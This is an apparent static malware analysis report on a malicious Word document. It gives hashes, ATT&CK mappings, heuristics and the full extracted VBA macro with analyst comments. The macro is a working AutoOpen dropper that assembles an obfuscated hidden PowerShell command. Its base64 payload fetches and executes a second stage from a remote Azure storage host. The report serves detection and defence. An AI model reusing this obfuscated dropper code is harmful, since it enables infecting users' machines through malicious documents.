Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 173c0269c68377c8…

MALICIOUS

Office (OLE)

282.5 KB · Created: 2018-02-21 14:33:00 · Authoring application: Microsoft Office Word · First seen: 2018-03-04
MD5: 17f5e61aa2c44acc66a155e7443aedd2 SHA-1: f6c29584335acbcecc1af9254ef114bb9c135a45 SHA-256: 173c0269c68377c8d790760a8cdb791c3e66ba192091070d8c14249a548e5ec6
Risk score: 170

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic) · T1204.002 (User Execution: Malicious File) · T1566.001 (Phishing: Spearphishing Attachment)

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro assembles and executes a shell command, most likely to download and run a secondary payload, as the ClamAV detection name 'Doc.Dropper.Agent-6453829-0' indicates. The legacy WordBasic auto-exec marker and the critical heuristic for a potential Shell call further support this conclusion.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6453829-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6453829-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        FR_MC = FR_MC + AQ_OC
        Shell$ FR_MC
    End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "freeform"
    Sub AutoOpen()
        Dim FR_MC As String
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (see OLE_VBA_MACROS and the extracted macros.bas), so here the marker corroborates the AutoOpen finding rather than standing alone.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard DrawingML XML namespace identifier that Office writes into its own files; it is not a destination the macro contacts.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5907 bytes
SHA-256: 512714d2c1ff1c9e28381d2ff56478b68d116b8f281837c5aeec9e79aa3df2fc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "freeform"
' Analyst annotation (report preview; macro code left byte-identical).
' AutoOpen is an auto-exec entry point, so this Sub runs when the document
' is opened with macros enabled (heuristic OLE_VBA_AUTOOPEN). It assembles
' a command line in two parts and hands it to Shell$ (OLE_VBA_SHELL):
'   FR_MC - built one character at a time by indexing the GN_QI table, so
'           the launcher never appears as a contiguous string literal;
'   AQ_OC - built by concatenating base64 fragments spread across many
'           single-use locals.
' GN_QI and AQ_OC are never Dim'd (no Option Explicit in the module), so
' they are implicit Variants; FR_MC is the only declared accumulator.
Sub AutoOpen()
    Dim FR_MC As String
    ' 20-entry character table; every GN_QI(n) below is a lookup into it.
    ' Resolving the indices in the order they are appended
    ' (6,11,7,13,16,18,14,13,19,19, 15,0,7,9,3,12,11,7,18,17,5,19,13, ...)
    ' yields "powershell -windowstyle hidden -executionpolicy bypass -e ",
    ' i.e. PowerShell with a hidden window and a base64-encoded command.
    ' Detection value: WINWORD spawning powershell.exe with these switches.
    GN_QI = Array("-", "c", "u", "n", "b", "y", "p", "w", "x", "i", "a", "o", "d", "e", "h", " ", "r", "t", "s", "l")
    Dim EM_NE As String
    ' First base64 fragment. PowerShell -e expects base64 of a UTF-16LE
    ' string; the "AGwA"-style byte pattern throughout the fragments is the
    ' interleaved NUL bytes of that encoding. Analyst decode of the full
    ' blob (verify independently): a PowerShell one-liner that defines a
    ' base64-to-string helper, fetches JSON with Invoke-WebRequest from an
    ' https URL on a *.table.core.windows.net host (Azure Table Storage),
    ' and pipes the response's .value.data through the helper into iex -
    ' a remote second-stage loader, consistent with the ClamAV 'Dropper'
    ' label. The decoded URL should be recovered as a blocking indicator;
    ' Office-originated HTTPS to table.core.windows.net is the network tell.
    EM_NE = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAApAHsAcgBl"
    FR_MC = FR_MC + GN_QI(6)
    FR_MC = FR_MC + GN_QI(11)
    Dim BQ_SF As String
    BQ_SF = "AHQAdQByAG4AIABbAFMAeQBzAH"
    FR_MC = FR_MC + GN_QI(7)
    FR_MC = FR_MC + GN_QI(13)
    Dim FN_RE As String
    FN_RE = "QAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBd"
    FR_MC = FR_MC + GN_QI(16)
    FR_MC = FR_MC + GN_QI(18)
    Dim HK_NF As String
    HK_NF = "ADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0A"
    FR_MC = FR_MC + GN_QI(14)
    FR_MC = FR_MC + GN_QI(13)
    Dim BS_NC As String
    BS_NC = "HIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvA"
    ' Fragments are flushed into AQ_OC five at a time; the FR_MC lines
    ' interleaved between them keep spelling out the launcher.
    AQ_OC = AQ_OC & EM_NE & BQ_SF & FN_RE & HK_NF & BS_NC
    FR_MC = FR_MC + GN_QI(19)
    FR_MC = FR_MC + GN_QI(19)
    Dim EP_TA As String
    EP_TA = "G4AdgBlAHIAdA"
    FR_MC = FR_MC + GN_QI(15)
    FR_MC = FR_MC + GN_QI(0)
    Dim CK_RJ As String
    CK_RJ = "BdADoAOgBGAHIAbwBtAEIAYQBz"
    FR_MC = FR_MC + GN_QI(7)
    FR_MC = FR_MC + GN_QI(9)
    Dim BK_OC As String
    BK_OC = "AGUANgA0AFMAdAByAGkAbg"
    FR_MC = FR_MC + GN_QI(3)
    FR_MC = FR_MC + GN_QI(12)
    Dim EP_TB As String
    EP_TB = "BnACgAJAB4ACkAKQB9AD"
    FR_MC = FR_MC + GN_QI(11)
    FR_MC = FR_MC + GN_QI(7)
    Dim EK_QE As String
    EK_QE = "sAaQBlAHgAIAAkACgAYQAgACQAKA"
    AQ_OC = AQ_OC & EP_TA & CK_RJ & BK_OC & EP_TB & EK_QE
    FR_MC = FR_MC + GN_QI(18)
    FR_MC = FR_MC + GN_QI(17)
    Dim BL_KE As String
    BL_KE = "AkACgAJAAoAGkAb"
    FR_MC = FR_MC + GN_QI(5)
    FR_MC = FR_MC + GN_QI(19)
    Dim BR_MH As String
    BR_MH = "gB2AG8AawBlAC0AdwBlAGIAcg"
    FR_MC = FR_MC + GN_QI(13)
    FR_MC = FR_MC + GN_QI(15)
    Dim IK_QA As String
    IK_QA = "BlAHEAdQBlAHMAdAAg"
    FR_MC = FR_MC + GN_QI(14)
    FR_MC = FR_MC + GN_QI(9)
    Dim GK_RJ As String
    GK_RJ = "ACcAaAB0AH"
    FR_MC = FR_MC + GN_QI(12)
    FR_MC = FR_MC + GN_QI(12)
    Dim CS_PJ As String
    CS_PJ = "QAcABzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAG"
    AQ_OC = AQ_OC & BL_KE & BR_MH & IK_QA & GK_RJ & CS_PJ
    FR_MC = FR_MC + GN_QI(13)
    FR_MC = FR_MC + GN_QI(3)
    Dim AR_PD As String
    AR_PD = "MAZQBuAHQAcgBhAGw"
    FR_MC = FR_MC + GN_QI(15)
    FR_MC = FR_MC + GN_QI(0)
    Dim IQ_OJ As String
    IQ_OJ = "ALgB0AGEAYgBsAGUALgBjAG8Acg"
    FR_MC = FR_MC + GN_QI(13)
    FR_MC = FR_MC + GN_QI(8)
    Dim JO_SJ As String
    JO_SJ = "BlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQ"
    FR_MC = FR_MC + GN_QI(13)
    FR_MC = FR_MC + GN_QI(1)
    Dim DN_LF As String
    DN_LF = "BoAG8AdQBzAGUAPwAkAGYAaQBsAHQA"
    FR_MC = FR_MC + GN_QI(2)
    FR_MC = FR_MC + GN_QI(17)
    Dim GL_TI As String
    GL_TI = "ZQByAD0AUABhAHIAdABp"
    AQ_OC = AQ_OC & AR_PD & IQ_OJ & JO_SJ & DN_LF & GL_TI
    FR_MC = FR_MC + GN_QI(9)
    FR_MC = FR_MC + GN_QI(11)
    Dim BP_OD As String
    BP_OD = "AHQAaQBvAG4ASwB"
    FR_MC = FR_MC + GN_QI(3)
    FR_MC = FR_MC + GN_QI(6)
    Dim AM_LF As String
    AM_LF = "lAHkAJQAyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAGcAZQA"
    FR_MC = FR_MC + GN_QI(11)
    FR_MC = FR_MC + GN_QI(19)
    Dim DN_NG As String
    DN_NG = "lADIANwAmACQAUwBlAGw"
    FR_MC = FR_MC + GN_QI(9)
    FR_MC = FR_MC + GN_QI(1)
    Dim DQ_KJ As String
    DQ_KJ = "AZQBjAHQAPQBkAGEAdABhACYAcwB2AD0AMgAwADEAN"
    FR_MC = FR_MC + GN_QI(5)
    FR_MC = FR_MC + GN_QI(15)
    Dim DR_PG As String
    DR_PG = "wAtADAANAAtADEANwAmAHMAcwA9AGIAZgBxAHQAJgBz"
    AQ_OC = AQ_OC & BP_OD & AM_LF & DN_NG & DQ_KJ & DR_PG
    FR_MC = FR_MC + GN_QI(4)
    FR_MC = FR_MC + GN_QI(5)
    Dim BS_PB As String
    BS_PB = "AHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AG"
    FR_MC = FR_MC + GN_QI(6)
    FR_MC = FR_MC + GN_QI(10)
    Dim DR_MF As String
    DR_MF = "QAbABhAGMAdQBwACYAcwBlA"
    FR_MC = FR_MC + GN_QI(18)
    FR_MC = FR_MC + GN_QI(18)
    Dim HT_LD As String
    HT_LD = "D0AMgAwADEANwAtADEAMAAtADAANgBUADIAMg"
    FR_MC = FR_MC + GN_QI(15)
    FR_MC = FR_MC + GN_QI(0)
    Dim EO_RA As String
    EO_RA = "A6ADQAMQA6ADEAMgBaACYAcwB0AD0AMgAwADEANwAt"
    FR_MC = FR_MC + GN_QI(13)
    ' Last launcher character appended (a trailing space after "-e");
    ' from here on only base64 fragments are collected.
    FR_MC = FR_MC + GN_QI(15)
    Dim CP_RD As String
    CP_RD = "ADAAOQAtADIAOABUADEANAA6ADQ"
    AQ_OC = AQ_OC & BS_PB & DR_MF & HT_LD & EO_RA & CP_RD
    Dim GL_LD As String
    GL_LD = "AMQA6ADEAMg"
    Dim GP_OB As String
    GP_OB = "BaACYAcwBwAHIAPQBoAHQAdABwAHMAJgBzAGkAZwA9AH"
    Dim CK_SI As String
    CK_SI = "QAegBQADcAYwA4AHgAWgBoAHIAMQBzAGIAdgB4ADkAZgB"
    Dim JM_KA As String
    JM_KA = "KAFMAdwBKAEkAUwBIAEIANgBlADgAJQAyAEI"
    Dim BT_TB As String
    BT_TB = "AbgBsAGwAdQBuAEgAaQBmAEwAM"
    AQ_OC = AQ_OC & GL_LD & GP_OB & CK_SI & JM_KA & BT_TB
    Dim IQ_RI As String
    IQ_RI = "wBoAHgAag"
    Dim AL_LC As String
    AL_LC = "A0ACUAMwBEACcAIAAtAEgA"
    Dim FK_QF As String
    FK_QF = "ZQBhAGQAZQByAHMAIABAAHsAJwBBAGMAYwBlAHAAdAAnAD0"
    Dim AT_OI As String
    AT_OI = "AJwBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALwBKAFMATwBOA"
    Dim FP_SI As String
    FP_SI = "CcAfQApAC4AQwBvAG4AdABlAG4AdAAg"
    AQ_OC = AQ_OC & IQ_RI & AL_LC & FK_QF & AT_OI & FP_SI
    Dim AQ_RH As String
    AQ_RH = "AHwAIABDAG8AbgB2AGUAcgB0AE"
    AQ_OC = AQ_OC & AQ_RH
    Dim BQ_QF As String
    BQ_QF = "YAcgBvAG0ALQBKAHMAbwBuACkALgB2AGEAbAB1"
    AQ_OC = AQ_OC & BQ_QF
    Dim IL_OC As String
    ' Final fragment; the "=" padding marks the end of the base64 blob.
    IL_OC = "AGUALgBkAGEAdABhACkAKQA="
    AQ_OC = AQ_OC & IL_OC
    ' Full command = launcher (FR_MC) & encoded payload (AQ_OC); Shell$
    ' executes it in a new process. This is the line OLE_VBA_SHELL matched.
    FR_MC = FR_MC + AQ_OC
    Shell$ FR_MC
End Sub